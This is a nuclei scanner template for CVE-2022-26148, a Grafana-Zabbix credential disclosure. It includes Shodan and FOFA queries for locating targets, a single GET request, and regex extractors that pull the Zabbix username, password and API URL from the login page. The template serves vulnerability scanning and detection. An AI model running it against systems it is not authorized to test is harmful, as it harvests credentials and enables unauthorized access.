nuclei-templates/http/cves/2022/CVE-2022-26148.yaml

68 lines
2.3 KiB
YAML

id: CVE-2022-26148
info:
name: Grafana & Zabbix Integration - Credentials Disclosure
author: Geekby
severity: critical
description: |
Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
impact: |
An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.
remediation: |
Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.
reference:
- https://2k8.org/post-319.html
- https://security.netapp.com/advisory/ntap-20220425-0005/
- https://nvd.nist.gov/vuln/detail/CVE-2022-26148
- https://github.com/HimmelAward/Goby_POC
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26148
cwe-id: CWE-312
epss-score: 0.15727
epss-percentile: 0.95795
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
fofa-query: app="Grafana"
tags: cve,cve2022,grafana,zabbix,exposure
http:
- method: GET
path:
- "{{BaseURL}}/login?redirect=%2F"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"zabbix":'
- '"zbx":'
- "alexanderzobnin-zabbix-datasource"
condition: or
- type: regex
part: body
regex:
- '"password":"(.*?)"'
- '"username":"(.*?)"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"password":"(.*?)"'
- '"username":"(.*?)"'
- '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950